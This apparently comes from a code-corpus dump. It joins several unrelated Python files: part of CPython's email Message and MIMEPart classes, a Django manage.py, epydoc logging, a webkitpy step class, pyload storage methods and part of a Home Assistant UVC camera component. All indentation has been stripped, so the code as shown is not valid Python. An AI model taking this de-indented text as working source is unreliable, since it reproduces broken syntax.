if not isinstance(charset, Charset):
charset = Charset(charset)
self._charset = charset
if 'MIME-Version' not in self:
self.add_header('MIME-Version', '1.0')
if 'Content-Type' not in self:
self.add_header('Content-Type', 'text/plain',
charset=charset.get_output_charset())
else:
self.set_param('charset', charset.get_output_charset())
if charset != charset.get_output_charset():
self._payload = charset.body_encode(self._payload)
if 'Content-Transfer-Encoding' not in self:
cte = charset.get_body_encoding()
try:
cte(self)
except TypeError:
# This 'if' is for backward compatibility, it allows unicode
# through even though that won't work correctly if the
# message is serialized.
payload = self._payload
if payload:
try:
payload = payload.encode('ascii', 'surrogateescape')
except UnicodeError:
payload = payload.encode(charset.output_charset)
self._payload = charset.body_encode(payload)
self.add_header('Content-Transfer-Encoding', cte)
def get_charset(self):
"""Return the Charset instance associated with the message's payload.
"""
return self._charset
#
# MAPPING INTERFACE (partial)
#
def __len__(self):
"""Return the total number of headers, including duplicates."""
return len(self._headers)
def __getitem__(self, name):
"""Get a header value.
Return None if the header is missing instead of raising an exception.
Note that if the header appeared multiple times, exactly which
occurrence gets returned is undefined. Use get_all() to get all
the values matching a header field name.
"""
return self.get(name)
def __setitem__(self, name, val):
"""Set the value of a header.
Note: this does not overwrite an existing header with the same field
name. Use __delitem__() first to delete any existing headers.
"""
max_count = self.policy.header_max_count(name)
if max_count:
lname = name.lower()
found = 0
for k, v in self._headers:
if k.lower() == lname:
found += 1
if found >= max_count:
raise ValueError("There may be at most {} {} headers "
"in a message".format(max_count, name))
self._headers.append(self.policy.header_store_parse(name, val))
def __delitem__(self, name):
"""Delete all occurrences of a header, if present.
Does not raise an exception if the header is missing.
"""
name = name.lower()
newheaders = []
for k, v in self._headers:
if k.lower() != name:
newheaders.append((k, v))
self._headers = newheaders
def __contains__(self, name):
return name.lower() in [k.lower() for k, v in self._headers]
def __iter__(self):
for field, value in self._headers:
yield field
def keys(self):
"""Return a list of all the message's header field names.
These will be sorted in the order they appeared in the original
message, or were added to the message, and may contain duplicates.
Any fields deleted and re-inserted are always appended to the header
list.
"""
return [k for k, v in self._headers]
def values(self):
"""Return a list of all the message's header values.
These will be sorted in the order they appeared in the original
message, or were added to the message, and may contain duplicates.
Any fields deleted and re-inserted are always appended to the header
list.
"""
return [self.policy.header_fetch_parse(k, v)
for k, v in self._headers]
def items(self):
"""Get all the message's header fields and values.
These will be sorted in the order they appeared in the original
message, or were added to the message, and may contain duplicates.
Any fields deleted and re-inserted are always appended to the header
list.
"""
return [(k, self.policy.header_fetch_parse(k, v))
for k, v in self._headers]
def get(self, name, failobj=None):
"""Get a header value.
Like __getitem__() but return failobj instead of None when the field
is missing.
"""
name = name.lower()
for k, v in self._headers:
if k.lower() == name:
return self.policy.header_fetch_parse(k, v)
return failobj
#
# "Internal" methods (public API, but only intended for use by a parser
# or generator, not normal application code.
#
def set_raw(self, name, value):
"""Store name and value in the model without modification.
This is an "internal" API, intended only for use by a parser.
"""
self._headers.append((name, value))
def raw_items(self):
"""Return the (name, value) header pairs without modification.
This is an "internal" API, intended only for use by a generator.
"""
return iter(self._headers.copy())
#
# Additional useful stuff
#
def get_all(self, name, failobj=None):
"""Return a list of all the values for the named field.
These will be sorted in the order they appeared in the original
message, and may contain duplicates. Any fields deleted and
re-inserted are always appended to the header list.
If no such fields exist, failobj is returned (defaults to None).
"""
values = []
name = name.lower()
for k, v in self._headers:
if k.lower() == name:
values.append(self.policy.header_fetch_parse(k, v))
if not values:
return failobj
return values
def add_header(self, _name, _value, **_params):
"""Extended header setting.
name is the header field to add. keyword arguments can be used to set
additional parameters for the header field, with underscores converted
to dashes. Normally the parameter will be added as key="value" unless
value is None, in which case only the key will be added. If a
parameter value contains non-ASCII characters it can be specified as a
three-tuple of (charset, language, value), in which case it will be
encoded according to RFC2231 rules. Otherwise it will be encoded using
the utf-8 charset and a language of ''.
Examples:
msg.add_header('content-disposition', 'attachment', filename='bud.gif')
msg.add_header('content-disposition', 'attachment',
filename=('utf-8', '', Fußballer.ppt'))
msg.add_header('content-disposition', 'attachment',
filename='Fußballer.ppt'))
"""
parts = []
for k, v in _params.items():
if v is None:
parts.append(k.replace('_', '-'))
else:
parts.append(_formatparam(k.replace('_', '-'), v))
if _value is not None:
parts.insert(0, _value)
self[_name] = SEMISPACE.join(parts)
def replace_header(self, _name, _value):
"""Replace a header.
Replace the first matching header found in the message, retaining
header order and case. If no matching header was found, a KeyError is
raised.
"""
_name = _name.lower()
for i, (k, v) in zip(range(len(self._headers)), self._headers):
if k.lower() == _name:
self._headers[i] = self.policy.header_store_parse(k, _value)
break
else:
raise KeyError(_name)
#
# Use these three methods instead of the three above.
#
def get_content_type(self):
"""Return the message's content type.
The returned string is coerced to lower case of the form
`maintype/subtype'. If there was no Content-Type header in the
message, the default type as given by get_default_type() will be
returned. Since according to RFC 2045, messages always have a default
type this will always return a value.
RFC 2045 defines a message's default type to be text/plain unless it
appears inside a multipart/digest container, in which case it would be
message/rfc822.
"""
missing = object()
value = self.get('content-type', missing)
if value is missing:
# This should have no parameters
return self.get_default_type()
ctype = _splitparam(value)[0].lower()
# RFC 2045, section 5.2 says if its invalid, use text/plain
if ctype.count('/') != 1:
return 'text/plain'
return ctype
def get_content_maintype(self):
"""Return the message's main content type.
This is the `maintype' part of the string returned by
get_content_type().
"""
ctype = self.get_content_type()
return ctype.split('/')[0]
def get_content_subtype(self):
"""Returns the message's sub-content type.
This is the `subtype' part of the string returned by
get_content_type().
"""
ctype = self.get_content_type()
return ctype.split('/')[1]
def get_default_type(self):
"""Return the `default' content type.
Most messages have a default content type of text/plain, except for
messages that are subparts of multipart/digest containers. Such
subparts have a default content type of message/rfc822.
"""
return self._default_type
def set_default_type(self, ctype):
"""Set the `default' content type.
ctype should be either "text/plain" or "message/rfc822", although this
is not enforced. The default content type is not stored in the
Content-Type header.
"""
self._default_type = ctype
def _get_params_preserve(self, failobj, header):
# Like get_params() but preserves the quoting of values. BAW:
# should this be part of the public interface?
missing = object()
value = self.get(header, missing)
if value is missing:
return failobj
params = []
for p in _parseparam(value):
try:
name, val = p.split('=', 1)
name = name.strip()
val = val.strip()
except ValueError:
# Must have been a bare attribute
name = p.strip()
val = ''
params.append((name, val))
params = utils.decode_params(params)
return params
def get_params(self, failobj=None, header='content-type', unquote=True):
"""Return the message's Content-Type parameters, as a list.
The elements of the returned list are 2-tuples of key/value pairs, as
split on the `=' sign. The left hand side of the `=' is the key,
while the right hand side is the value. If there is no `=' sign in
the parameter the value is the empty string. The value is as
described in the get_param() method.
Optional failobj is the object to return if there is no Content-Type
header. Optional header is the header to search instead of
Content-Type. If unquote is True, the value is unquoted.
"""
missing = object()
params = self._get_params_preserve(missing, header)
if params is missing:
return failobj
if unquote:
return [(k, _unquotevalue(v)) for k, v in params]
else:
return params
def get_param(self, param, failobj=None, header='content-type',
unquote=True):
"""Return the parameter value if found in the Content-Type header.
Optional failobj is the object to return if there is no Content-Type
header, or the Content-Type header has no such parameter. Optional
header is the header to search instead of Content-Type.
Parameter keys are always compared case insensitively. The return
value can either be a string, or a 3-tuple if the parameter was RFC
2231 encoded. When it's a 3-tuple, the elements of the value are of
the form (CHARSET, LANGUAGE, VALUE). Note that both CHARSET and
LANGUAGE can be None, in which case you should consider VALUE to be
encoded in the us-ascii charset. You can usually ignore LANGUAGE.
The parameter value (either the returned string, or the VALUE item in
the 3-tuple) is always unquoted, unless unquote is set to False.
If your application doesn't care whether the parameter was RFC 2231
encoded, it can turn the return value into a string as follows:
rawparam = msg.get_param('foo')
param = email.utils.collapse_rfc2231_value(rawparam)
"""
if header not in self:
return failobj
for k, v in self._get_params_preserve(failobj, header):
if k.lower() == param.lower():
if unquote:
return _unquotevalue(v)
else:
return v
return failobj
def set_param(self, param, value, header='Content-Type', requote=True,
charset=None, language='', replace=False):
"""Set a parameter in the Content-Type header.
If the parameter already exists in the header, its value will be
replaced with the new value.
If header is Content-Type and has not yet been defined for this
message, it will be set to "text/plain" and the new parameter and
value will be appended as per RFC 2045.
An alternate header can specified in the header argument, and all
parameters will be quoted as necessary unless requote is False.
If charset is specified, the parameter will be encoded according to RFC
2231. Optional language specifies the RFC 2231 language, defaulting
to the empty string. Both charset and language should be strings.
"""
if not isinstance(value, tuple) and charset:
value = (charset, language, value)
if header not in self and header.lower() == 'content-type':
ctype = 'text/plain'
else:
ctype = self.get(header)
if not self.get_param(param, header=header):
if not ctype:
ctype = _formatparam(param, value, requote)
else:
ctype = SEMISPACE.join(
[ctype, _formatparam(param, value, requote)])
else:
ctype = ''
for old_param, old_value in self.get_params(header=header,
unquote=requote):
append_param = ''
if old_param.lower() == param.lower():
append_param = _formatparam(param, value, requote)
else:
append_param = _formatparam(old_param, old_value, requote)
if not ctype:
ctype = append_param
else:
ctype = SEMISPACE.join([ctype, append_param])
if ctype != self.get(header):
if replace:
self.replace_header(header, ctype)
else:
del self[header]
self[header] = ctype
def del_param(self, param, header='content-type', requote=True):
"""Remove the given parameter completely from the Content-Type header.
The header will be re-written in place without the parameter or its
value. All values will be quoted as necessary unless requote is
False. Optional header specifies an alternative to the Content-Type
header.
"""
if header not in self:
return
new_ctype = ''
for p, v in self.get_params(header=header, unquote=requote):
if p.lower() != param.lower():
if not new_ctype:
new_ctype = _formatparam(p, v, requote)
else:
new_ctype = SEMISPACE.join([new_ctype,
_formatparam(p, v, requote)])
if new_ctype != self.get(header):
del self[header]
self[header] = new_ctype
def set_type(self, type, header='Content-Type', requote=True):
"""Set the main type and subtype for the Content-Type header.
type must be a string in the form "maintype/subtype", otherwise a
ValueError is raised.
This method replaces the Content-Type header, keeping all the
parameters in place. If requote is False, this leaves the existing
header's quoting as is. Otherwise, the parameters will be quoted (the
default).
An alternative header can be specified in the header argument. When
the Content-Type header is set, we'll always also add a MIME-Version
header.
"""
# BAW: should we be strict?
if not type.count('/') == 1:
raise ValueError
# Set the Content-Type, you get a MIME-Version
if header.lower() == 'content-type':
del self['mime-version']
self['MIME-Version'] = '1.0'
if header not in self:
self[header] = type
return
params = self.get_params(header=header, unquote=requote)
del self[header]
self[header] = type
# Skip the first param; it's the old type.
for p, v in params[1:]:
self.set_param(p, v, header, requote)
def get_filename(self, failobj=None):
"""Return the filename associated with the payload if present.
The filename is extracted from the Content-Disposition header's
`filename' parameter, and it is unquoted. If that header is missing
the `filename' parameter, this method falls back to looking for the
`name' parameter.
"""
missing = object()
filename = self.get_param('filename', missing, 'content-disposition')
if filename is missing:
filename = self.get_param('name', missing, 'content-type')
if filename is missing:
return failobj
return utils.collapse_rfc2231_value(filename).strip()
def get_boundary(self, failobj=None):
"""Return the boundary associated with the payload if present.
The boundary is extracted from the Content-Type header's `boundary'
parameter, and it is unquoted.
"""
missing = object()
boundary = self.get_param('boundary', missing)
if boundary is missing:
return failobj
# RFC 2046 says that boundaries may begin but not end in w/s
return utils.collapse_rfc2231_value(boundary).rstrip()
def set_boundary(self, boundary):
"""Set the boundary parameter in Content-Type to 'boundary'.
This is subtly different than deleting the Content-Type header and
adding a new one with a new boundary parameter via add_header(). The
main difference is that using the set_boundary() method preserves the
order of the Content-Type header in the original message.
HeaderParseError is raised if the message has no Content-Type header.
"""
missing = object()
params = self._get_params_preserve(missing, 'content-type')
if params is missing:
# There was no Content-Type header, and we don't know what type
# to set it to, so raise an exception.
raise errors.HeaderParseError('No Content-Type header found')
newparams = []
foundp = False
for pk, pv in params:
if pk.lower() == 'boundary':
newparams.append(('boundary', '"%s"' % boundary))
foundp = True
else:
newparams.append((pk, pv))
if not foundp:
# The original Content-Type header had no boundary attribute.
# Tack one on the end. BAW: should we raise an exception
# instead???
newparams.append(('boundary', '"%s"' % boundary))
# Replace the existing Content-Type header with the new value
newheaders = []
for h, v in self._headers:
if h.lower() == 'content-type':
parts = []
for k, v in newparams:
if v == '':
parts.append(k)
else:
parts.append('%s=%s' % (k, v))
val = SEMISPACE.join(parts)
newheaders.append(self.policy.header_store_parse(h, val))
else:
newheaders.append((h, v))
self._headers = newheaders
def get_content_charset(self, failobj=None):
"""Return the charset parameter of the Content-Type header.
The returned string is always coerced to lower case. If there is no
Content-Type header, or if that header has no charset parameter,
failobj is returned.
"""
missing = object()
charset = self.get_param('charset', missing)
if charset is missing:
return failobj
if isinstance(charset, tuple):
# RFC 2231 encoded, so decode it, and it better end up as ascii.
pcharset = charset[0] or 'us-ascii'
try:
# LookupError will be raised if the charset isn't known to
# Python. UnicodeError will be raised if the encoded text
# contains a character not in the charset.
as_bytes = charset[2].encode('raw-unicode-escape')
charset = str(as_bytes, pcharset)
except (LookupError, UnicodeError):
charset = charset[2]
# charset characters must be in us-ascii range
try:
charset.encode('us-ascii')
except UnicodeError:
return failobj
# RFC 2046, $4.1.2 says charsets are not case sensitive
return charset.lower()
def get_charsets(self, failobj=None):
"""Return a list containing the charset(s) used in this message.
The returned list of items describes the Content-Type headers'
charset parameter for this message and all the subparts in its
payload.
Each item will either be a string (the value of the charset parameter
in the Content-Type header of that part) or the value of the
'failobj' parameter (defaults to None), if the part does not have a
main MIME type of "text", or the charset is not defined.
The list will contain one string for each part of the message, plus
one for the container message (i.e. self), so that a non-multipart
message will still return a list of length 1.
"""
return [part.get_content_charset(failobj) for part in self.walk()]
# I.e. def walk(self): ...
from email.iterators import walk
# XXX Support for temporary deprecation hack for is_attachment property.
class _IsAttachment:
def __init__(self, value):
self.value = value
def __call__(self):
return self.value
def __bool__(self):
warnings.warn("is_attachment will be a method, not a property, in 3.5",
DeprecationWarning,
stacklevel=3)
return self.value
class MIMEPart(Message):
def __init__(self, policy=None):
if policy is None:
from email.policy import default
policy = default
Message.__init__(self, policy)
@property
def is_attachment(self):
c_d = self.get('content-disposition')
result = False if c_d is None else c_d.content_disposition == 'attachment'
# XXX transitional hack to raise deprecation if not called.
return _IsAttachment(result)
def _find_body(self, part, preferencelist):
if part.is_attachment():
return
maintype, subtype = part.get_content_type().split('/')
if maintype == 'text':
if subtype in preferencelist:
yield (preferencelist.index(subtype), part)
return
if maintype != 'multipart':
return
if subtype != 'related':
for subpart in part.iter_parts():
yield from self._find_body(subpart, preferencelist)
return
if 'related' in preferencelist:
yield (preferencelist.index('related'), part)
candidate = None
start = part.get_param('start')
if start:
for subpart in part.iter_parts():
if subpart['content-id'] == start:
candidate = subpart
break
if candidate is None:
subparts = part.get_payload()
candidate = subparts[0] if subparts else None
if candidate is not None:
yield from self._find_body(candidate, preferencelist)
def get_body(self, preferencelist=('related', 'html', 'plain')):
"""Return best candidate mime part for display as 'body' of message.
Do a depth first search, starting with self, looking for the first part
matching each of the items in preferencelist, and return the part
corresponding to the first item that has a match, or None if no items
have a match. If 'related' is not included in preferencelist, consider
the root part of any multipart/related encountered as a candidate
match. Ignore parts with 'Content-Disposition: attachment'.
"""
best_prio = len(preferencelist)
body = None
for prio, part in self._find_body(self, preferencelist):
if prio < best_prio:
best_prio = prio
body = part
if prio == 0:
break
return body
_body_types = {('text', 'plain'),
('text', 'html'),
('multipart', 'related'),
('multipart', 'alternative')}
def iter_attachments(self):
"""Return an iterator over the non-main parts of a multipart.
Skip the first of each occurrence of text/plain, text/html,
multipart/related, or multipart/alternative in the multipart (unless
they have a 'Content-Disposition: attachment' header) and include all
remaining subparts in the returned iterator. When applied to a
multipart/related, return all parts except the root part. Return an
empty iterator when applied to a multipart/alternative or a
non-multipart.
"""
maintype, subtype = self.get_content_type().split('/')
if maintype != 'multipart' or subtype == 'alternative':
return
parts = self.get_payload()
if maintype == 'multipart' and subtype == 'related':
# For related, we treat everything but the root as an attachment.
# The root may be indicated by 'start'; if there's no start or we
# can't find the named start, treat the first subpart as the root.
start = self.get_param('start')
if start:
found = False
attachments = []
for part in parts:
if part.get('content-id') == start:
found = True
else:
attachments.append(part)
if found:
yield from attachments
return
parts.pop(0)
yield from parts
return
# Otherwise we more or less invert the remaining logic in get_body.
# This only really works in edge cases (ex: non-text relateds or
# alternatives) if the sending agent sets content-disposition.
seen = [] # Only skip the first example of each candidate type.
for part in parts:
maintype, subtype = part.get_content_type().split('/')
if ((maintype, subtype) in self._body_types and
not part.is_attachment() and subtype not in seen):
seen.append(subtype)
continue
yield part
def iter_parts(self):
"""Return an iterator over all immediate subparts of a multipart.
Return an empty iterator for a non-multipart.
"""
if self.get_content_maintype() == 'multipart':
yield from self.get_payload()
def get_content(self, *args, content_manager=None, **kw):
if content_manager is None:
content_manager = self.policy.content_manager
return content_manager.get_content(self, *args, **kw)
def set_content(self, *args, content_manager=None, **kw):
if content_manager is None:
content_manager = self.policy.content_manager
content_manager.set_content(self, *args, **kw)
def _make_multipart(self, subtype, disallowed_subtypes, boundary):
if self.get_content_maintype() == 'multipart':
existing_subtype = self.get_content_subtype()
disallowed_subtypes = disallowed_subtypes + (subtype,)
if existing_subtype in disallowed_subtypes:
raise ValueError("Cannot convert {} to {}".format(
existing_subtype, subtype))
keep_headers = []
part_headers = []
for name, value in self._headers:
if name.lower().startswith('content-'):
part_headers.append((name, value))
else:
keep_headers.append((name, value))
if part_headers:
# There is existing content, move it to the first subpart.
part = type(self)(policy=self.policy)
part._headers = part_headers
part._payload = self._payload
self._payload = [part]
else:
self._payload = []
self._headers = keep_headers
self['Content-Type'] = 'multipart/' + subtype
if boundary is not None:
self.set_param('boundary', boundary)
def make_related(self, boundary=None):
self._make_multipart('related', ('alternative', 'mixed'), boundary)
def make_alternative(self, boundary=None):
self._make_multipart('alternative', ('mixed',), boundary)
def make_mixed(self, boundary=None):
self._make_multipart('mixed', (), boundary)
def _add_multipart(self, _subtype, *args, _disp=None, **kw):
if (self.get_content_maintype() != 'multipart' or
self.get_content_subtype() != _subtype):
getattr(self, 'make_' + _subtype)()
part = type(self)(policy=self.policy)
part.set_content(*args, **kw)
if _disp and 'content-disposition' not in part:
part['Content-Disposition'] = _disp
self.attach(part)
def add_related(self, *args, **kw):
self._add_multipart('related', *args, _disp='inline', **kw)
def add_alternative(self, *args, **kw):
self._add_multipart('alternative', *args, **kw)
def add_attachment(self, *args, **kw):
self._add_multipart('mixed', *args, _disp='attachment', **kw)
def clear(self):
self._headers = []
self._payload = None
def clear_content(self):
self._headers = [(n, v) for n, v in self._headers
if not n.lower().startswith('content-')]
self._payload = None
class EmailMessage(MIMEPart):
def set_content(self, *args, **kw):
super().set_content(*args, **kw)
if 'MIME-Version' not in self:
self['MIME-Version'] = '1.0'
|
modulexcite/PTVS | refs/heads/master | Python/Tests/TestData/WFastCgi/DjangoSimpleAppUrlRewrite/manage.py | 56 | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "DjangoApplication.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
suncycheng/intellij-community | refs/heads/master | python/helpers/epydoc/log.py | 99 | # epydoc -- Logging
#
# Copyright (C) 2005 Edward Loper
# Author: Edward Loper <edloper@loper.org>
# URL: <http://epydoc.sf.net>
#
# $Id: log.py 1488 2007-02-14 00:34:27Z edloper $
"""
Functions used to report messages and progress updates to the user.
These functions are delegated to zero or more registered L{Logger}
objects, which are responsible for actually presenting the information
to the user. Different interfaces are free to create and register
their own C{Logger}s, allowing them to present this information in the
manner that is best suited to each interface.
@note: I considered using the standard C{logging} package to provide
this functionality. However, I found that it would be too difficult
to get that package to provide the behavior I want (esp. with respect
to progress displays; but also with respect to message blocks).
@group Message Severity Levels: DEBUG, INFO, WARNING, ERROR, FATAL
"""
__docformat__ = 'epytext en'
import sys, os
DEBUG = 10
INFO = 20
DOCSTRING_WARNING = 25
WARNING = 30
ERROR = 40
FATAL = 40
######################################################################
# Logger Base Class
######################################################################
class Logger:
"""
An abstract base class that defines the interface for X{loggers},
which are used by epydoc to report information back to the user.
Loggers are responsible for tracking two types of information:
- Messages, such as warnings and errors.
- Progress on the current task.
This abstract class allows the command-line interface and the
graphical interface to each present this information to the user
in the way that's most natural for each interface. To set up a
logger, create a subclass of C{Logger} that overrides all methods,
and register it using L{register_logger}.
"""
#////////////////////////////////////////////////////////////
# Messages
#////////////////////////////////////////////////////////////
def log(self, level, message):
"""
Display a message.
@param message: The message string to display. C{message} may
contain newlines, but does not need to end in a newline.
@param level: An integer value indicating the severity of the
message.
"""
def close(self):
"""
Perform any tasks needed to close this logger.
"""
#////////////////////////////////////////////////////////////
# Message blocks
#////////////////////////////////////////////////////////////
def start_block(self, header):
"""
Start a new message block. Any calls to L{info()},
L{warning()}, or L{error()} that occur between a call to
C{start_block} and a corresponding call to C{end_block} will
be grouped together, and displayed with a common header.
C{start_block} can be called multiple times (to form nested
blocks), but every call to C{start_block} I{must} be balanced
by a call to C{end_block}.
"""
def end_block(self):
"""
End a warning block. See L{start_block} for details.
"""
#////////////////////////////////////////////////////////////
# Progress bar
#////////////////////////////////////////////////////////////
def start_progress(self, header=None):
"""
Begin displaying progress for a new task. C{header} is a
description of the task for which progress is being reported.
Each call to C{start_progress} must be followed by a call to
C{end_progress} (with no intervening calls to
C{start_progress}).
"""
def end_progress(self):
"""
Finish off the display of progress for the current task. See
L{start_progress} for more information.
"""
def progress(self, percent, message=''):
"""
Update the progress display.
@param percent: A float from 0.0 to 1.0, indicating how much
progress has been made.
@param message: A message indicating the most recent action
that contributed towards that progress.
"""
class SimpleLogger(Logger):
def __init__(self, threshold=WARNING):
self.threshold = threshold
def log(self, level, message):
if level >= self.threshold: print message
######################################################################
# Logger Registry
######################################################################
_loggers = []
"""
The list of registered logging functions.
"""
def register_logger(logger):
"""
Register a logger. Each call to one of the logging functions
defined by this module will be delegated to each registered
logger.
"""
_loggers.append(logger)
def remove_logger(logger):
_loggers.remove(logger)
######################################################################
# Logging Functions
######################################################################
# The following methods all just delegate to the corresponding
# methods in the Logger class (above) for each registered logger.
def fatal(*messages):
"""Display the given fatal message."""
message = ' '.join(['%s' % (m,) for m in messages])
for logger in _loggers: logger.log(FATAL, message)
def error(*messages):
"""Display the given error message."""
message = ' '.join(['%s' % (m,) for m in messages])
for logger in _loggers: logger.log(ERROR, message)
def warning(*messages):
"""Display the given warning message."""
message = ' '.join(['%s' % (m,) for m in messages])
for logger in _loggers: logger.log(WARNING, message)
def docstring_warning(*messages):
"""Display the given docstring warning message."""
message = ' '.join(['%s' % (m,) for m in messages])
for logger in _loggers: logger.log(DOCSTRING_WARNING, message)
def info(*messages):
"""Display the given informational message."""
message = ' '.join(['%s' % (m,) for m in messages])
for logger in _loggers: logger.log(INFO, message)
def debug(*messages):
"""Display the given debugging message."""
message = ' '.join(['%s' % (m,) for m in messages])
for logger in _loggers: logger.log(DEBUG, message)
def start_block(header):
for logger in _loggers: logger.start_block(header)
start_block.__doc__ = Logger.start_block.__doc__
def end_block():
for logger in _loggers: logger.end_block()
end_block.__doc__ = Logger.end_block.__doc__
def start_progress(header=None):
for logger in _loggers: logger.start_progress(header)
start_progress.__doc__ = Logger.start_progress.__doc__
def end_progress():
for logger in _loggers: logger.end_progress()
end_progress.__doc__ = Logger.end_progress.__doc__
def progress(percent, message=''):
for logger in _loggers: logger.progress(percent, '%s' % message)
progress.__doc__ = Logger.progress.__doc__
def close():
for logger in _loggers: logger.close()
|
smishenk/blink-crosswalk | refs/heads/master | Tools/Scripts/webkitpy/tool/steps/abstractstep.py | 50 | # Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
from webkitpy.common.system.executive import ScriptError
from webkitpy.tool.steps.options import Options
class AbstractStep(object):
def __init__(self, tool, options):
self._tool = tool
self._options = options
def _exit(self, code):
sys.exit(code)
@classmethod
def options(cls):
return [
# We need this option here because cached_lookup uses it. :(
Options.git_commit,
]
def run(self, state):
raise NotImplementedError, "subclasses must implement"
|
chaosblog/pyload | refs/heads/stable | module/database/StorageDatabase.py | 41 | # -*- coding: utf-8 -*-
"""
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License,
or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, see <http://www.gnu.org/licenses/>.
@author: mkaay
"""
from module.database import style
from module.database import DatabaseBackend
class StorageMethods():
@style.queue
def setStorage(db, identifier, key, value):
db.c.execute("SELECT id FROM storage WHERE identifier=? AND key=?", (identifier, key))
if db.c.fetchone() is not None:
db.c.execute("UPDATE storage SET value=? WHERE identifier=? AND key=?", (value, identifier, key))
else:
db.c.execute("INSERT INTO storage (identifier, key, value) VALUES (?, ?, ?)", (identifier, key, value))
@style.queue
def getStorage(db, identifier, key=None):
if key is not None:
db.c.execute("SELECT value FROM storage WHERE identifier=? AND key=?", (identifier, key))
row = db.c.fetchone()
if row is not None:
return row[0]
else:
db.c.execute("SELECT key, value FROM storage WHERE identifier=?", (identifier, ))
d = {}
for row in db.c:
d[row[0]] = row[1]
return d
@style.queue
def delStorage(db, identifier, key):
db.c.execute("DELETE FROM storage WHERE identifier=? AND key=?", (identifier, key))
DatabaseBackend.registerSub(StorageMethods)
|
jnewland/home-assistant | refs/heads/ci | homeassistant/components/uvc/camera.py | 7 | """Support for Ubiquiti's UVC cameras."""
import logging
import socket
import requests
import voluptuous as vol
from homeassistant.const import CONF_PORT, CONF_SSL
from homeassistant.components.camera import Camera, PLATFORM_SCHEMA
import homeassistant.helpers.config_validation as cv
from homeassistant.exceptions import PlatformNotReady
_LOGGER = logging.getLogger(__name__)
CONF_NVR = 'nvr'
CONF_KEY = 'key'
CONF_PASSWORD = 'password'
DEFAULT_PASSWORD = 'ubnt'
DEFAULT_PORT = 7080
DEFAULT_SSL = False
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_NVR): cv.string,
vol.Required(CONF_KEY): cv.string,
vol.Optional(CONF_PASSWORD, default=DEFAULT_PASSWORD): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_SSL, default=DEFAULT_SSL): cv.boolean,
})
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Discover cameras on a Unifi NVR."""
addr = config[CONF_NVR]
key = config[CONF_KEY]
password = config[CONF_PASSWORD]
port = config[CONF_PORT]
ssl = config[CONF_SSL]
from uvcclient import nvr
try:
# Exceptions may be raised in all method calls to the nvr library.
nvrconn = nvr.UVCRemote(addr, port, key, ssl=ssl)
cameras = nvrconn.index()
identifier = 'id' if nvrconn.server_version >= (3, 2, 0) else 'uuid'
# Filter out airCam models, which are not supported in the latest
# version of UnifiVideo and which are EOL by Ubiquiti
cameras = [
camera for camera in cameras
if 'airCam' not in nvrconn.get_camera(camera[identifier])['model']]
except nvr.NotAuthorized:
_LOGGER.error("Authorization failure while connecting to NVR")
return False
except nvr.NvrError as ex:
_LOGGER.error("NVR refuses to talk to me: %s", str(ex))
raise PlatformNotReady
except requests.exceptions.ConnectionError as ex:
_LOGGER.error("Unable to connect to NVR: %s", str(ex))
raise PlatformNotReady
add_entities([UnifiVideoCamera(nvrconn,
camera[identifier],
camera['name'],
password)
for camera in cameras])
return True
class UnifiVideoCamera(Camera):
"""A Ubiquiti Unifi Video Camera."""
def __init__(self, nvr, uuid, name, password):
"""Initialize an Unifi camera."""
super(UnifiVideoCamera, self).__init__()
self._nvr = nvr
self._uuid = uuid
self._name = name
self._password = password
self.is_streaming = False
self._connect_addr = None
self._camera = None
self._motion_status = False
@property
def name(self):
"""Return the name of this camera."""
return self._name
@property
def is_recording(self):
"""Return true if the camera is recording."""
caminfo = self._nvr.get_camera(self._uuid)
return caminfo['recordingSettings']['fullTimeRecordEnabled']
@property
def motion_detection_enabled(self):
"""Camera Motion Detection Status."""
caminfo = self._nvr.get_camera(self._uuid)
return caminfo['recordingSettings']['motionRecordEnabled']
@property
def brand(self):
"""Return the brand of this camera."""
return 'Ubiquiti'
@property
def model(self):
"""Return the model of this camera."""
caminfo = self._nvr.get_camera(self._uuid)
return caminfo['model']
def _login(self):
"""Login to the camera."""
from uvcclient import camera as uvc_camera
caminfo = self._nvr.get_camera(self._uuid)
if self._connect_addr:
addrs = [self._connect_addr]
else:
addrs = [caminfo['host'], caminfo['internalHost']]
if self._nvr.server_version >= (3, 2, 0):
client_cls = uvc_camera.UVCCameraClientV320
else:
client_cls = uvc_camera.UVCCameraClient
if caminfo['username'] is None:
